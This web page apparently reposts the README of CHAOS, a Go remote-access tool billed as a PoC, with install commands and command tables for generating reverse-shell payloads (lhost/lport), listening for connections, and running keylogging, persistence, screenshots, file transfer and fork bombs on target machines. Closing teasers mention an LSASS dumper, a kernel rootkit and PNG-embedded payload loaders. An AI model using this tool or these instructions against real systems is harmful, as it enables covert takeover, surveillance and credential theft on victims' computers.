CHAOS is a PoC that allow generate payloads and control remote operating systems.
Features
| Feature | Windows | Mac | Linux |
|---|---|---|---|
Reverse Shell | X | X | X |
Download File | X | X | X |
Upload File | X | X | X |
Screenshot | X | X | X |
Keylogger | X | ||
Persistence | X | ||
Open URL | X | X | X |
Get OS Info | X | X | X |
Fork Bomb | X | X | X |
Run Hidden | X |
Also Read – Osmedeus : Fully Automated Offensive Security Tool for Reconnaissance & Vulnerability Scanning
How to Install
Install dependencies
$ sudo apt install golang git -y
Get this repository
$ go get github.com/tiagorlampert/CHAOS
Get external golang dependencies (ARE REQUIRED GET ALL DEPENDENCIES)
$ go get github.com/kbinani/screenshot
$ go get github.com/lxn/win
$ go get github.com/matishsiao/goInfo
$ go get golang.org/x/sys/windows
Maybe you will see the message “package github.com/lxn/win: build constraints exclude all Go files”.
It’s occurs because the libraries are to windows systems, but it necessary to build the payload.
Go into the repository
$ cd ~/go/src/github.com/tiagorlampert/CHAOS
Run
$ go run main.go
How to Use?
| Command | On HOST does… |
|---|---|
generate | Generate a payload (e.g. generate lhost=192.168.0.100 lport=8080 fname=chaos --windows) |
lhost= | Specify a ip for connection |
lport= | Specify a port for connection |
fname= | Specify a filename to output |
--windows | Target Windows |
--macos | Target Mac OS |
--linux | Target Linux |
listen | Listen for a new connection (e.g. listen lport=8080) |
serve | Serve files |
exit | Quit this program |
| Command | On TARGET does… |
|---|---|
download | File Download |
upload | File Upload |
screenshot | Take a Screenshot |
keylogger_start | Start Keylogger session |
keylogger_show | Show Keylogger session logs |
persistence_enable | Install at Startup |
persistence_disable | Remove from Startup |
getos | Get OS name |
lockscreen | Lock the OS screen |
openurl | Open the URL informed |
bomb | Run Fork Bomb |
clear | Clear the Screen |
back | Close connection but keep running on target |
exit | Close connection and exit on target |
Demo Video
Disclaimer
THIS SOFTWARE IS PROVIDED “AS IS” WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
bomber is an application that scans SBOMs for security vulnerabilities. So you've asked a vendor…
Embed a payload within a PNG file by splitting the payload across multiple IDAT sections.…
Exploit-Street, where we dive into the ever-evolving world of cybersecurity with a focus on Local…
Shadow Dumper is a powerful tool used to dump LSASS (Local Security Authority Subsystem Service)…
shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…
Extract and execute a PE embedded within a PNG file using an LNK file. The…